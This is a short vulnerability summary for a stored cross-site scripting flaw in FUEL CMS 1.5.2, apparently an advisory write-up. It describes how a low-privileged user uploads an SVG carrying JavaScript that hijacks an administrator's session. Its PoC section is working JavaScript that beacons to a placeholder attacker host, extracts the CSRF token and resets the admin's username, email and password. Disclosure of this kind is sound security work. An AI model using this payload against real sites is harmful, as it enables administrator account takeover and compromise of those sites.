# CVE-2026-38948 Vulnerability Summary ## Overview * **Vulnerability Name**: FUEL CMS 1.5.2 Stored Cross-Site Scripting (Stored XSS) Leading to Administrator Account Takeover * **CVE ID**: CVE-2026-38948 * **Severity**: 7.1 High * **Vulnerability Type**: Stored Cross-Site Scripting (Stored XSS) * **Exploitation Principle**: An authenticated low-privileged user can upload a malicious SVG file containing embedded JavaScript via the asset upload feature. When an administrator opens or previews this file, the script executes within the administrator’s browser session, stealing the CSRF token and modifying sensitive account settings (such as username, email, and password), ultimately resulting in full takeover of the administrator account. ## Affected Scope * **Affected Product**: FUEL CMS * **Affected Versions**: 1.5.2 and earlier versions ## Remediation * **Official Link**: https://github.com/daylightstudio/FUEL-CMS * **Vendor Website**: https://www.getfuelcms.com/ ## POC Code ```html fetch('http://YOURIP:5656/admin-opened'); fetch('/fuel/my_profile/edit', {credentials: 'include'}) .then(r=>r.text()) .then(html=>{ let token = html.match(/ci_csrf_token_FUEL" value="([^"]+)"/)[1]; let data = new FormData(); data.append("user_name","account_taken"); data.append("email","account_taken@fuel.com"); data.append("first_name","account_taken"); data.append("last_name","name"); data.append("new_password","1234"); data.append("confirm_password","1234"); data.append("language","english"); data.append("ci_csrf_token_FUEL",token); data.append("fuel_inline","0"); fetch('/fuel/my_profile/edit?inline=1',{ method: 'POST', body: data, credentials: 'include' }); }); ```